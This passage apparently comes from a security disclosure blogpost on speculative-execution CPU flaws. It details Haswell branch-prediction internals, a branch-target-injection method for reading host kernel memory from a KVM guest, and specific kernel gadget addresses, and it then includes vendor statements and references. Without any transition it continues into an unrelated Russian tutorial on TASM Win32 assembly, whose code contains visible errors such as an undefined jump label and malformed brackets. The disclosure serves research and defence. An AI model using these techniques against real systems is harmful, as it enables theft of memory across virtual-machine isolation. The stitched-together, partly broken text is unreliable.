Prior research (see the Literature section at the end) has shown that it is possible for code in separate security contexts to influence each other’s branch prediction. So far, this has only been used to infer information about where code is located (in other words, to create interference from the victim to the attacker); however, the basic hypothesis of this attack variant is that it can also be used to redirect execution of code in the victim context (in other words, to create interference from the attacker to the victim; the other way around).

The basic idea for the attack is to target victim code that contains an indirect branch whose target address is loaded from memory and flush the cache line containing the target address out to main memory. Then, when the CPU reaches the indirect branch, it won’t know the true destination of the jump, and it won’t be able to calculate the true destination until it has finished loading the cache line back into the CPU, which takes a few hundred cycles. Therefore, there is a time window of typically over 100 cycles in which the CPU will speculatively execute instructions based on branch prediction.

## Haswell branch prediction internals

Some of the internals of the branch prediction implemented by Intel’s processors have already been published; however, getting this attack to work properly required significant further experimentation to determine additional details.

This section focuses on the branch prediction internals that were experimentally derived from the Intel Haswell Xeon CPU.

Haswell seems to have multiple branch prediction mechanisms that work very differently:

• A generic branch predictor that can only store one target per source address; used for all kinds of jumps, like absolute jumps, relative jumps and so on.
• A specialized indirect call predictor that can store multiple targets per source address; used for indirect calls.
• (There is also a specialized return predictor, according to Intel’s optimization manual, but we haven’t analyzed that in detail yet. If this predictor could be used to reliably dump out some of the call stack through which a VM was entered, that would be very interesting.)

### Generic predictor

The generic branch predictor, as documented in prior research, only uses the lower 31 bits of the address of the last byte of the source instruction for its prediction. If, for example, a branch target buffer (BTB) entry exists for a jump from 0x4141.0004.1000 to 0x4141.0004.5123, the generic predictor will also use it to predict a jump from 0x4242.0004.1000. When the higher bits of the source address differ like this, the higher bits of the predicted destination change together with it—in this case, the predicted destination address will be 0x4242.0004.5123—so apparently this predictor doesn’t store the full, absolute destination address.

Before the lower 31 bits of the source address are used to look up a BTB entry, they are folded together using XOR. Specifically, the following bits are folded together:

 bit A bit B 0x40.0000 0x2000 0x80.0000 0x4000 0x100.0000 0x8000 0x200.0000 0x1.0000 0x400.0000 0x2.0000 0x800.0000 0x4.0000 0x2000.0000 0x10.0000 0x4000.0000 0x20.0000

In other words, if a source address is XORed with both numbers in a row of this table, the branch predictor will not be able to distinguish the resulting address from the original source address when performing a lookup. For example, the branch predictor is able to distinguish source addresses 0x100.0000 and 0x180.0000, and it can also distinguish source addresses 0x100.0000 and 0x180.8000, but it can’t distinguish source addresses 0x100.0000 and 0x140.2000 or source addresses 0x100.0000 and 0x180.4000. In the following, this will be referred to as aliased source addresses.

When an aliased source address is used, the branch predictor will still predict the same target as for the unaliased source address. This indicates that the branch predictor stores a truncated absolute destination address, but that hasn’t been verified.

Based on observed maximum forward and backward jump distances for different source addresses, the low 32-bit half of the target address could be stored as an absolute 32-bit value with an additional bit that specifies whether the jump from source to target crosses a 232 boundary; if the jump crosses such a boundary, bit 31 of the source address determines whether the high half of the instruction pointer should increment or decrement.

### Indirect call predictor

The inputs of the BTB lookup for this mechanism seem to be:

• The low 12 bits of the address of the source instruction (we are not sure whether it’s the address of the first or the last byte) or a subset of them.
• The branch history buffer state.

If the indirect call predictor can’t resolve a branch, it is resolved by the generic predictor instead. Intel’s optimization manual hints at this behavior: «Indirect Calls and Jumps. These may either be predicted as having a monotonic target or as having targets that vary in accordance with recent program behavior.»

The branch history buffer (BHB) stores information about the last 29 taken branches — basically a fingerprint of recent control flow — and is used to allow better prediction of indirect calls that can have multiple targets.

The update function of the BHB works as follows (in pseudocode; src is the address of the last byte of the source instruction, dst is the destination address):

void bhb_update(uint58_t *bhb_state, unsigned long src, unsigned long dst) {
*bhb_state <<= 2;
*bhb_state ^= (dst & 0x3f);
*bhb_state ^= (src & 0xc0) >> 6;
*bhb_state ^= (src & 0xc00) >> (10 — 2);
*bhb_state ^= (src & 0xc000) >> (14 — 4);
*bhb_state ^= (src & 0x30) << (6 — 4);
*bhb_state ^= (src & 0x300) << (8 — 8);
*bhb_state ^= (src & 0x3000) >> (12 — 10);
*bhb_state ^= (src & 0x30000) >> (16 — 12);
*bhb_state ^= (src & 0xc0000) >> (18 — 14);
}

Some of the bits of the BHB state seem to be folded together further using XOR when used for a BTB access, but the precise folding function hasn’t been understood yet.

The BHB is interesting for two reasons. First, knowledge about its approximate behavior is required in order to be able to accurately cause collisions in the indirect call predictor. But it also permits dumping out the BHB state at any repeatable program state at which the attacker can execute code — for example, when attacking a hypervisor, directly after a hypercall. The dumped BHB state can then be used to fingerprint the hypervisor or, if the attacker has access to the hypervisor binary, to determine the low 20 bits of the hypervisor load address (in the case of KVM: the low 20 bits of the load address of kvm-intel.ko).

### Reverse-Engineering Branch Predictor Internals

This subsection describes how we reverse-engineered the internals of the Haswell branch predictor. Some of this is written down from memory, since we didn’t keep a detailed record of what we were doing.

We initially attempted to perform BTB injections into the kernel using the generic predictor, using the knowledge from prior research that the generic predictor only looks at the lower half of the source address and that only a partial target address is stored. This kind of worked — however, the injection success rate was very low, below 1%. (This is the method we used in our preliminary PoCs for method 2 against modified hypervisors running on Haswell.)

We decided to write a userspace test case to be able to more easily test branch predictor behavior in different situations.

Based on the assumption that branch predictor state is shared between hyperthreads [10], we wrote a program of which two instances are each pinned to one of the two logical processors running on a specific physical core, where one instance attempts to perform branch injections while the other measures how often branch injections are successful. Both instances were executed with ASLR disabled and had the same code at the same addresses. The injecting process performed indirect calls to a function that accesses a (per-process) test variable; the measuring process performed indirect calls to a function that tests, based on timing, whether the per-process test variable is cached, and then evicts it using CLFLUSH. Both indirect calls were performed through the same callsite. Before each indirect call, the function pointer stored in memory was flushed out to main memory using CLFLUSH to widen the speculation time window. Additionally, because of the reference to «recent program behavior» in Intel’s optimization manual, a bunch of conditional branches that are always taken were inserted in front of the indirect call.

In this test, the injection success rate was above 99%, giving us a base setup for future experiments.

We then tried to figure out the details of the prediction scheme. We assumed that the prediction scheme uses a global branch history buffer of some kind.

To determine the duration for which branch information stays in the history buffer, a conditional branch that is only taken in one of the two program instances was inserted in front of the series of always-taken conditional jumps, then the number of always-taken conditional jumps (N) was varied. The result was that for N=25, the processor was able to distinguish the branches (misprediction rate under 1%), but for N=26, it failed to do so (misprediction rate over 99%).
Therefore, the branch history buffer had to be able to store information about at least the last 26 branches.

The code in one of the two program instances was then moved around in memory. This revealed that only the lower 20 bits of the source and target addresses have an influence on the branch history buffer.

Testing with different types of branches in the two program instances revealed that static jumps, taken conditional jumps, calls and returns influence the branch history buffer the same way; non-taken conditional jumps don’t influence it; the address of the last byte of the source instruction is the one that counts; IRETQ doesn’t influence the history buffer state (which is useful for testing because it permits creating program flow that is invisible to the history buffer).

Moving the last conditional branch before the indirect call around in memory multiple times revealed that the branch history buffer contents can be used to distinguish many different locations of that last conditional branch instruction. This suggests that the history buffer doesn’t store a list of small history values; instead, it seems to be a larger buffer in which history data is mixed together.

However, a history buffer needs to «forget» about past branches after a certain number of new branches have been taken in order to be useful for branch prediction. Therefore, when new data is mixed into the history buffer, this can not cause information in bits that are already present in the history buffer to propagate downwards — and given that, upwards combination of information probably wouldn’t be very useful either. Given that branch prediction also must be very fast, we concluded that it is likely that the update function of the history buffer left-shifts the old history buffer, then XORs in the new state (see diagram).

If this assumption is correct, then the history buffer contains a lot of information about the most recent branches, but only contains as many bits of information as are shifted per history buffer update about the last branch about which it contains any data. Therefore, we tested whether flipping different bits in the source and target addresses of a jump followed by 32 always-taken jumps with static source and target allows the branch prediction to disambiguate an indirect call. [11]

With 32 static jumps in between, no bit flips seemed to have an influence, so we decreased the number of static jumps until a difference was observable. The result with 28 always-taken jumps in between was that bits 0x1 and 0x2 of the target and bits 0x40 and 0x80 of the source had such an influence; but flipping both 0x1 in the target and 0x40 in the source or 0x2 in the target and 0x80 in the source did not permit disambiguation. This shows that the per-insertion shift of the history buffer is 2 bits and shows which data is stored in the least significant bits of the history buffer. We then repeated this with decreased amounts of fixed jumps after the bit-flipped jump to determine which information is stored in the remaining bits.

## Reading host memory from a KVM guest

### Locating the host kernel

Our PoC locates the host kernel in several steps. The information that is determined and necessary for the next steps of the attack consists of:

• lower 20 bits of the address of kvm-intel.ko

Looking back, this is unnecessarily complicated, but it nicely demonstrates the various techniques an attacker can use. A simpler way would be to first determine the address of vmlinux, then bisect the addresses of kvm.ko and kvm-intel.ko.

In the first step, the address of kvm-intel.ko is leaked. For this purpose, the branch history buffer state after guest entry is dumped out. Then, for every possible value of bits 12..19 of the load address of kvm-intel.ko, the expected lowest 16 bits of the history buffer are computed based on the load address guess and the known offsets of the last 8 branches before guest entry, and the results are compared against the lowest 16 bits of the leaked history buffer state.

The branch history buffer state is leaked in steps of 2 bits by measuring misprediction rates of an indirect call with two targets. One way the indirect call is reached is from a vmcall instruction followed by a series of N branches whose relevant source and target address bits are all zeroes. The second way the indirect call is reached is from a series of controlled branches in userspace that can be used to write arbitrary values into the branch history buffer.
Misprediction rates are measured as in the section «Reverse-Engineering Branch Predictor Internals», using one call target that loads a cache line and another one that checks whether the same cache line has been loaded.

With N=29, mispredictions will occur at a high rate if the controlled branch history buffer value is zero because all history buffer state from the hypercall has been erased. With N=28, mispredictions will occur if the controlled branch history buffer value is one of 0<<(28*2), 1<<(28*2), 2<<(28*2), 3<<(28*2) — by testing all four possibilities, it can be detected which one is right. Then, for decreasing values of N, the four possibilities are {0|1|2|3}<<(28*2) | (history_buffer_for(N+1) >> 2). By repeating this for decreasing values for N, the branch history buffer value for N=0 can be determined.

At this point, the low 20 bits of kvm-intel.ko are known; the next step is to roughly locate kvm.ko.
For this, the generic branch predictor is used, using data inserted into the BTB by an indirect call from kvm.ko to kvm-intel.ko that happens on every hypercall; this means that the source address of the indirect call has to be leaked out of the BTB.

kvm.ko will probably be located somewhere in the range from 0xffffffffc0000000 to0xffffffffc4000000, with page alignment (0x1000). This means that the first four entries in the table in the section «Generic Predictor» apply; there will be 24-1=15 aliasing addresses for the correct one. But that is also an advantage: It cuts down the search space from 0x4000 to 0x4000/24=1024.

To find the right address for the source or one of its aliasing addresses, code that loads data through a specific register is placed at all possible call targets (the leaked low 20 bits of kvm-intel.ko plus the in-module offset of the call target plus a multiple of 220) and indirect calls are placed at all possible call sources. Then, alternatingly, hypercalls are performed and indirect calls are performed through the different possible non-aliasing call sources, with randomized history buffer state that prevents the specialized prediction from working. After this step, there are 216 remaining possibilities for the load address of kvm.ko.

Next, the load address of vmlinux can be determined in a similar way, using an indirect call from vmlinux to kvm.ko. Luckily, none of the bits which are randomized in the load address of vmlinux  are folded together, so unlike when locating kvm.ko, the result will directly be unique. vmlinux has an alignment of 2MiB and a randomization range of 1GiB, so there are still only 512 possible addresses.
Because (as far as we know) a simple hypercall won’t actually cause indirect calls from vmlinux to kvm.ko, we instead use port I/O from the status register of an emulated serial port, which is present in the default configuration of a virtual machine created with virt-manager.

The only remaining piece of information is which one of the 16 aliasing load addresses of kvm.ko is actually correct. Because the source address of an indirect call to kvm.ko is known, this can be solved using bisection: Place code at the various possible targets that, depending on which instance of the code is speculatively executed, loads one of two cache lines, and measure which one of the cache lines gets loaded.

### Identifying cache sets

The PoC assumes that the VM does not have access to hugepages.To discover eviction sets for all L3 cache sets with a specific alignment relative to a 4KiB page boundary, the PoC first allocates 25600 pages of memory. Then, in a loop, it selects random subsets of all remaining unsorted pages such that the expected number of sets for which an eviction set is contained in the subset is 1, reduces each subset down to an eviction set by repeatedly accessing its cache lines and testing whether the cache lines are always cached (in which case they’re probably not part of an eviction set) and attempts to use the new eviction set to evict all remaining unsorted cache lines to determine whether they are in the same cache set [12].

### Locating the host-virtual address of a guest page

Because this attack uses a FLUSH+RELOAD approach for leaking data, it needs to know the host-kernel-virtual address of one guest page. Alternative approaches such as PRIME+PROBE should work without that requirement.

The basic idea for this step of the attack is to use a branch target injection attack against the hypervisor to load an attacker-controlled address and test whether that caused the guest-owned page to be loaded. For this, a gadget that simply loads from the memory location specified by R8 can be used — R8-R11 still contain guest-controlled values when the first indirect call after a guest exit is reached on this kernel build.

We expected that an attacker would need to either know which eviction set has to be used at this point or brute-force it simultaneously; however, experimentally, using random eviction sets works, too. Our theory is that the observed behavior is actually the result of L1D and L2 evictions, which might be sufficient to permit a few instructions worth of speculative execution.

The host kernel maps (nearly?) all physical memory in the physmap area, including memory assigned to KVM guests. However, the location of the physmap is randomized (with a 1GiB alignment), in an area of size 128PiB. Therefore, directly bruteforcing the host-virtual address of a guest page would take a long time. It is not necessarily impossible; as a ballpark estimate, it should be possible within a day or so, maybe less, assuming 12000 successful injections per second and 30 guest pages that are tested in parallel; but not as impressive as doing it in a few minutes.

To optimize this, the problem can be split up: First, brute-force the physical address using a gadget that can load from physical addresses, then brute-force the base address of the physmap region. Because the physical address can usually be assumed to be far below 128PiB, it can be brute-forced more efficiently, and brute-forcing the base address of the physmap region afterwards is also easier because then address guesses with 1GiB alignment can be used.

ffffffff810a9def:       4c 89 c0                mov    rax,r8
ffffffff810a9df2:       4d 63 f9                movsxd r15,r9d
ffffffff810a9df5:       4e 8b 04 fd c0 b3 a6    mov    r8,QWORD PTR [r15*8-0x7e594c40]
ffffffff810a9dfc:       81
ffffffff810a9dfd:       4a 8d 3c 00             lea    rdi,[rax+r8*1]
ffffffff810a9e01:       4d 8b a4 00 f8 00 00    mov    r12,QWORD PTR [r8+rax*1+0xf8]
ffffffff810a9e08:       00

This gadget permits loading an 8-byte-aligned value from the area around the kernel text section by setting R9 appropriately, which in particular permits loading page_offset_base, the start address of the physmap. Then, the value that was originally in R8 — the physical address guess minus 0xf8 — is added to the result of the previous load, 0xfa is added to it, and the result is dereferenced.

### Cache set selection

To select the correct L3 eviction set, the attack from the following section is essentially executed with different eviction sets until it works.

### Leaking data

At this point, it would normally be necessary to locate gadgets in the host kernel code that can be used to actually leak data by reading from an attacker-controlled location, shifting and masking the result appropriately and then using the result of that as offset to an attacker-controlled address for a load. But piecing gadgets together and figuring out which ones work in a speculation context seems annoying. So instead, we decided to use the eBPF interpreter, which is built into the host kernel — while there is no legitimate way to invoke it from inside a VM, the presence of the code in the host kernel’s text section is sufficient to make it usable for the attack, just like with ordinary ROP gadgets.

The eBPF interpreter entry point has the following function signature:

static unsigned int __bpf_prog_run(void *ctx, const struct bpf_insn *insn)

The second parameter is a pointer to an array of statically pre-verified eBPF instructions to be executed — which means that __bpf_prog_run() will not perform any type checks or bounds checks. The first parameter is simply stored as part of the initial emulated register state, so its value doesn’t matter.

The eBPF interpreter provides, among other things:

• multiple emulated 64-bit registers
• 64-bit immediate writes to emulated registers
• bitwise operations (including bit shifts) and arithmetic operations

To call the interpreter entry point, a gadget that gives RSI and RIP control given R8-R11 control and controlled data at a known memory location is necessary. The following gadget provides this functionality:

ffffffff81514edd:       4c 89 ce                mov    rsi,r9
ffffffff81514ee0:       41 ff 90 b0 00 00 00    call   QWORD PTR [r8+0xb0]

Now, by pointing R8 and R9 at the mapping of a guest-owned page in the physmap, it is possible to speculatively execute arbitrary unvalidated eBPF bytecode in the host kernel. Then, relatively straightforward bytecode can be used to leak data into the cache.

# Variant 3: Rogue data cache load

In summary, an attack using this variant of the issue attempts to read kernel memory from userspace without misdirecting the control flow of kernel code. This works by using the code pattern that was used for the previous variants, but in userspace. The underlying idea is that the permission check for accessing an address might not be on the critical path for reading data from memory to a register, where the permission check could have significant performance impact. Instead, the memory read could make the result of the read available to following instructions immediately and only perform the permission check asynchronously, setting a flag in the reorder buffer that causes an exception to be raised if the permission check fails.

We do have a few additions to make to Anders Fogh’s blogpost:

«Imagine the following instruction executed in usermode
It will cause an interrupt when retired, […]»

It is also possible to already execute that instruction behind a high-latency mispredicted branch to avoid taking a page fault. This might also widen the speculation window by increasing the delay between the read from a kernel address and delivery of the associated exception.

«First, I call a syscall that touches this memory. Second, I use the prefetcht0 instruction to improve my odds of having the address loaded in L1.»

When we used prefetch instructions after doing a syscall, the attack stopped working for us, and we have no clue why. Perhaps the CPU somehow stores whether access was denied on the last access and prevents the attack from working if that is the case?

«Fortunately I did not get a slow read suggesting that Intel null’s the result when the access is not allowed.»

That (read from kernel address returns all-zeroes) seems to happen for memory that is not sufficiently cached but for which pagetable entries are present, at least after repeated read attempts. For unmapped memory, the kernel address read does not return a result at all.

# Ideas for further research

We believe that our research provides many remaining research topics that we have not yet investigated, and we encourage other public researchers to look into these.
This section contains an even higher amount of speculation than the rest of this blogpost — it contains untested ideas that might well be useless.

## Leaking without data cache timing

It would be interesting to explore whether there are microarchitectural attacks other than measuring data cache timing that can be used for exfiltrating data out of speculative execution.

## Other microarchitectures

Our research was relatively Haswell-centric so far. It would be interesting to see details e.g. on how the branch prediction of other modern processors works and how well it can be attacked.

## Other JIT engines

We developed a successful variant 1 attack against the JIT engine built into the Linux kernel. It would be interesting to see whether attacks against more advanced JIT engines with less control over the system are also practical — in particular, JavaScript engines.

## More efficient scanning for host-virtual addresses and cache sets

In variant 2, while scanning for the host-virtual address of a guest-owned page, it might make sense to attempt to determine its L3 cache set first. This could be done by performing L3 evictions using an eviction pattern through the physmap, then testing whether the eviction affected the guest-owned page.

The same might work for cache sets — use an L1D+L2 eviction set to evict the function pointer in the host kernel context, use a gadget in the kernel to evict an L3 set using physical addresses, then use that to identify which cache sets guest lines belong to until a guest-owned eviction set has been constructed.

## Dumping the complete BTB state

Given that the generic BTB seems to only be able to distinguish 231-8 or fewer source addresses, it seems feasible to dump out the complete BTB state generated by e.g. a hypercall in a timeframe around the order of a few hours. (Scan for jump sources, then for every discovered jump source, bisect the jump target.) This could potentially be used to identify the locations of functions in the host kernel even if the host kernel is custom-built.

The source address aliasing would reduce the usefulness somewhat, but because target addresses don’t suffer from that, it might be possible to correlate (source,target) pairs from machines with different KASLR offsets and reduce the number of candidate addresses based on KASLR being additive while aliasing is bitwise.

This could then potentially allow an attacker to make guesses about the host kernel version or the compiler used to build it based on jump offsets or distances between functions.

## Variant 2: Leaking with more efficient gadgets

If sufficiently efficient gadgets are used for variant 2, it might not be necessary to evict host kernel function pointers from the L3 cache at all; it might be sufficient to only evict them from L1D and L2.

## Various speedups

In particular the variant 2 PoC is still a bit slow. This is probably partly because:

• It only leaks one bit at a time; leaking more bits at a time should be doable.
• It heavily uses IRETQ for hiding control flow from the processor.

It would be interesting to see what data leak rate can be achieved using variant 2.

## Leaking or injection through the return predictor

If the return predictor also doesn’t lose its state on a privilege level change, it might be useful for either locating the host kernel from inside a VM (in which case bisection could be used to very quickly discover the full address of the host kernel) or injecting return targets (in particular if the return address is stored in a cache line that can be flushed out by the attacker and isn’t reloaded before the return instruction).

However, we have not performed any experiments with the return predictor that yielded conclusive results so far.

## Leaking data out of the indirect call predictor

We have attempted to leak target information out of the indirect call predictor, but haven’t been able to make it work.

# Vendor statements

The following statement were provided to us regarding this issue from the vendors to whom Project Zero disclosed this vulnerability:

## Intel

Intel is committed to improving the overall security of computer systems. The methods described here rely on common properties of modern microprocessors. Thus, susceptibility to these methods is not limited to Intel processors, nor does it mean that a processor is working outside its intended functional specification. Intel is working closely with our ecosystem partners, as well as with other silicon vendors whose processors are affected, to design and distribute both software and hardware mitigations for these methods.

## ARM

Arm recognises that the speculation functionality of many modern high-performance processors, despite working as intended, can be used in conjunction with the timing of cache operations to leak some information as described in this blog. Correspondingly, Arm has developed software mitigations that we recommend be deployed.

Specific details regarding the affected processors and mitigations can be found at this website:https://developer.arm.com/support/security-update

Arm has included a detailed technical whitepaper as well as links to information from some of Arm’s architecture partners regarding their specific implementations and mitigations.

# Literature

Note that some of these documents — in particular Intel’s documentation — change over time, so quotes from and references to it may not reflect the latest version of Intel’s documentation.

• https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-optimization-manual.pdf: Intel’s optimization manual has many interesting pieces of optimization advice that hint at relevant microarchitectural behavior; for example:
• «Placing data immediately following an indirect branch can cause a performance problem. If the data consists of all zeros, it looks like a long stream of ADDs to memory destinations and this can cause resource conflicts and slow down branch recovery. Also, data immediately following indirect branches may appear as branches to the branch predication [sic] hardware, which can branch off to execute other data pages. This can lead to subsequent self-modifying code problems.»
• «Loads can:[…]Be carried out speculatively, before preceding branches are resolved.»
• «Software should avoid writing to a code page in the same 1-KByte subpage that is being executed or fetching code in the same 2-KByte subpage of that is being written. In addition, sharing a page containing directly or speculatively executed code with another processor as a data page can trigger an SMC condition that causes the entire pipeline of the machine and the trace cache to be cleared. This is due to the self-modifying code condition.»
• «if mapped as WB or WT, there is a potential for speculative processor reads to bring the data into the caches»
• «Failure to map the region as WC may allow the line to be speculatively read into the processor caches (via the wrong path of a mispredicted branch).»
• https://software.intel.com/en-us/articles/intel-sdm: Intel’s Software Developer Manuals
• http://www.agner.org/optimize/microarchitecture.pdf: Agner Fog’s documentation of reverse-engineered processor behavior and relevant theory was very helpful for this research.
• http://www.cs.binghamton.edu/~dima/micro16.pdf and https://github.com/felixwilhelm/mario_baslr: Prior research by Dmitry Evtyushkin, Dmitry Ponomarev and Nael Abu-Ghazaleh on abusing branch target buffer behavior to leak addresses that we used as a starting point for analyzing the branch prediction of Haswell processors. Felix Wilhelm’s research based on this provided the basic idea behind variant 2.
• https://arxiv.org/pdf/1507.06955.pdf: The rowhammer.js research by Daniel Gruss, Clémentine Maurice and Stefan Mangard contains information about L3 cache eviction patterns that we reused in the KVM PoC to evict a function pointer.
• https://xania.org/201602/bpu-part-one: Matt Godbolt blogged about reverse-engineering the structure of the branch predictor on Intel processors.
• https://www.sophia.re/thesis.pdf: Sophia D’Antoine wrote a thesis that shows that opcode scheduling can theoretically be used to transmit data between hyperthreads.
• https://gruss.cc/files/kaiser.pdf: Daniel Gruss, Moritz Lipp, Michael Schwarz, Richard Fellner, Clémentine Maurice, and Stefan Mangard wrote a paper on mitigating microarchitectural issues caused by pagetable sharing between userspace and the kernel.
• https://www.jilp.org/: This journal contains many articles on branch prediction.
• http://blog.stuffedcow.net/2013/01/ivb-cache-replacement/: This blogpost by Henry Wong investigates the L3 cache replacement policy used by Intel’s Ivy Bridge architecture.

# References

[1] This initial report did not contain any information about variant 3. We had discussed whether direct reads from kernel memory could work, but thought that it was unlikely. We later tested and reported variant 3 prior to the publication of Anders Fogh’s work at https://cyber.wtf/2017/07/28/negative-result-reading-kernel-memory-from-user-mode/.
[2] The precise model names are listed in the section «Tested Processors». The code for reproducing this is in the writeup_files.tar archive in our bugtracker, in the folders userland_test_x86 and userland_test_aarch64.
[3] The attacker-controlled offset used to perform an out-of-bounds access on an array by this PoC is a 32-bit value, limiting the accessible addresses to a 4GiB window in the kernel heap area.
[4] This PoC won’t work on CPUs with SMAP support; however, that is not a fundamental limitation.
[5] linux-image-4.9.0-3-amd64 at version 4.9.30-2+deb9u2 (available athttp://snapshot.debian.org/archive/debian/20170701T224614Z/pool/main/l/linux/linux-image-4.9.0-3-amd64_4.9.30-2%2Bdeb9u2_amd64.deb, sha256 5f950b26aa7746d75ecb8508cc7dab19b3381c9451ee044cd2edfd6f5efff1f8, signed via Release.gpgReleasePackages.xz); that was the current distro kernel version when I set up the machine. It is very unlikely that the PoC works with other kernel versions without changes; it contains a number of hardcoded addresses/offsets.
[6] The phone was running an Android build from May 2017.
[9] More than 215 mappings would be more efficient, but the kernel places a hard cap of 216 on the number of VMAs that a process can have.
[10] Intel’s optimization manual states that «In the first implementation of HT Technology, the physical execution resources are shared and the architecture state is duplicated for each logical processor», so it would be plausible for predictor state to be shared. While predictor state could be tagged by logical core, that would likely reduce performance for multithreaded processes, so it doesn’t seem likely.
[11] In case the history buffer was a bit bigger than we had measured, we added some margin — in particular because we had seen slightly different history buffer lengths in different experiments, and because 26 isn’t a very round number.
[12] The basic idea comes from http://palms.ee.princeton.edu/system/files/SP_vfinal.pdf, section IV, although the authors of that paper still used hugepages.

## Assembler & Win32

В отличие от программирования под DOS, где программы написанные на языках высокого уровня (ЯВУ) были мало похожи на свои аналоги, написанные на ассемблере, приложения под Win32 имеют гораздо больше общего. В первую очередь, это связано с тем, что обращение к сервису операционной системы в Windows осуществляется посредством вызова функций, а не прерываний, что было характерно для DOS. Здесь нет передачи параметров в регистрах при обращении к сервисным функциям и, соответственно, нет и множества результирующих значений возвращаемых в регистрах общего назначения и регистре флагов. Следовательно проще запомнить и использовать протоколы вызова функций системного сервиса. С другой стороны, в Win32 нельзя непосредственно работать с аппаратным уровнем, чем \»грешили\» программы для DOS. Вообще написание программ под Win32 стало значительно проще и это обусловлено следующими факторами:

отсутствие startup кода, характерного для приложений и динамических библиотек написанных под Windows 3.x;
гибкая система адресации к памяти: возможность обращаться к памяти через любой регистр общего назначения; \»отсутствие\» сегментных регистров;
доступность больших объёмов виртуальной памяти;
развитый сервис операционной системы, обилие функций, облегчающих разработку приложений;
многообразие и доступность средств создания интерфейса с пользователем (диалоги, меню и т.п.).
Современный ассемблер, к которому относится и TASM 5.0 фирмы Borland International Inc., в свою очередь, развивал средства, которые ранее были характерны только для ЯВУ. К таким средствам можно отнести макроопределение вызова процедур, возможность введения шаблонов процедур (описание прототипов) и даже объектно-ориентированные расширения. Однако, ассемблер сохранил и такой прекрасный инструмент, как макроопределения вводимые пользователем, полноценного аналога которому нет ни в одном ЯВУ.

Все эти факторы позволяют рассматривать ассемблер, как самостоятельный инструмент для написания приложений под платформы Win32 (Windows NT и Windows 95). Как иллюстрацию данного положения, рассмотрим простой пример приложения, работающего с диалоговым окном.

Пример 1. Программа работы с диалогом Файл, содержащий текст приложения, dlg.asm
IDEAL
P586
MODEL FLAT
%NOINCL
%NOLIST
include \»winconst.inc\» ; API Win32 consts
include \»winptype.inc\» ; API Win32 functions prototype
include \»winprocs.inc\» ; API Win32 function
include \»resource.inc\» ; resource consts
MAX_USER_NAME = 20
DataSeg
szAppName db \’Demo 1\’, 0
szHello db \’Hello, \’
szUser db MAX_USER_NAME dup (0)
CodeSeg
Start: call GetModuleHandleA, 0
call DialogBoxParamA, eax, IDD_DIALOG, 0, offset DlgProc, 0
cmp eax,IDOK
jne bye
call MessageBoxA, 0, offset szHello, \\
offset szAppName, \\
MB_OK or MB_ICONINFORMATION
bye: call ExitProcess, 0
public stdcall DlgProc
proc DlgProc stdcall
arg @@hDlg :dword, @@iMsg :dword, @@wPar :dword, @@lPar :dword
mov eax,[@@iMsg] cmp eax,WM_INITDIALOG
je @@init
cmp eax,WM_COMMAND
jne @@ret_false
mov eax,[@@wPar] cmp eax,IDCANCEL
je @@cancel
cmp eax,IDOK
jne @@ret_false
call GetDlgItemTextA, [@@hDlg[, IDR_NAME, \\
offset szUser, MAX_USER_NAME
mov eax,IDOK
@@cancel: call EndDialog, [@@hDlg[, eax
@@ret_false: xor eax,eax
ret
@@init: call GetDlgItem, [@@hDlg], IDR_NAME
call SetFocus, eax
jmp @@ret_false
endp DlgProc
end Start
Файл ресурсов dlg.rc

#include \»resource.h\»
IDD_DIALOG DIALOGEX 0, 0, 187, 95
STYLE DS_MODALFRAME | DS_3DLOOK | WS_POPUP | WS_CAPTION | WS_SYSMENU
EXSTYLE WS_EX_CLIENTEDGE
CAPTION \»Dialog\»
FONT 8, \»MS Sans Serif\»
BEGIN
DEFPUSHBUTTON \»OK\»,IDOK,134,76,50,14
PUSHBUTTON \»Cancel\»,IDCANCEL,73,76,50,14
EDITTEXT IDR_NAME,72,32,112,14,ES_AUTOHSCROLL
END
Остальные файлы из данного примера, приведены в приложении 1.

Сразу после метки Start, программа обращается к функции API Win32 GetModuleHandle для получения handle данного модуля (данный параметр чаще именуют как handle of instance). Получив handle, мы вызываем диалог, созданный либо вручную, либо с помощью какой-либо программы построителя ресурсов. Далее программа проверяет результат работы диалогового окна. Если пользователь вышел из диалога посредством нажатия клавиши OK, то приложение запускает MessageBox с текстом приветствия.

Диалоговая процедура обрабатывает следующие сообщения. При инициализации диалога (WM_INITDIALOG) она просит Windows установить фокус на поле ввода имени пользователя. Сообщение WM_COMMAND обрабатывается в таком порядке: делается проверка на код нажатия клавиши. Если была нажата клавиша OK, то пользовательский ввод копируется в переменную szValue, если же была нажата клавиша Cancel, то копирования не производится. Но и в том и другом случае вызывается функция

окончания диалога: EndDialog. Остальные сообщения в группе WM_COMMAND просто игнорируются, предоставляя Windows действовать по умолчанию.

Вы можете сравнить приведённую программу с аналогичной программой, написанной на ЯВУ, разница в написании будет незначительна. Очевидно те, кто писал приложения на ассемблере под Windows 3.x, отметят тот факт, что исчезла необходимость в сложном и громоздком startup коде. Теперь приложение выглядит более просто и естественно.

Пример 2. Динамическая библиотека
Написание динамических библиотек под Win32 также значительно упростилось, по сравнению с тем, как это делалось под Windows 3.x. Исчезла необходимость вставлять startup код, а использование четырёх событий инициализации/деинициализации на уровне процессов и потоков, кажется логичным.

Рассмотрим простой пример динамической библиотеки, в которой всего одна функция, преобразования целого числа в строку в шестнадцатеричной системе счисления. Файл mylib.asm

Ideal
P586
Model flat
DLL_PROCESS_ATTACH = 1

extrn GetVersion: proc

DataSeg
hInst dd 0
OSVer dw 0

CodeSeg
proc libEntry stdcall
arg @@hInst :dword, @@rsn :dword, @@rsrv :dword
cmp [@@rsn],DLL_PROCESS_ATTACH
jne @@1
call GetVersion
mov [OSVer],ax
mov eax,[@@hInst] mov [hInst],eax
@@1: mov eax,1
ret
endP libEntry

public stdcall Hex2Str
proc Hex2Str stdcall
arg @@num :dword, @@str :dword
uses ebx
mov eax,[@@num] mov ebx,[@@str] mov ecx,7
@@1: mov edx,eax
shr eax,4
and edx,0F
cmp edx,0A
jae @@2
jmp @@3
@@3: mov [byte ebx + ecx],dl
dec ecx
jns @@1
mov [byte ebx + 8],0
ret
endp Hex2Str

end libEntry
Остальные файлы, которые необходимы для данного примера, можно найти в приложении 2.

Краткие комментарии к динамической библиотеке

Процедура libEntry является точкой входа в динамическую библиотеку, её не надо объявлять как экспортируемую, загрузчик сам определяет её местонахождение. LibEntry может вызываться в четырёх случаях:

при проецировании библиотеки в адресное пространство процесса (DLL_PROCESS_ATTACH);
при первом вызове библиотеки из потока (DLL_THREAD_ATTACH), например, с помощью функции LoadLibrary;
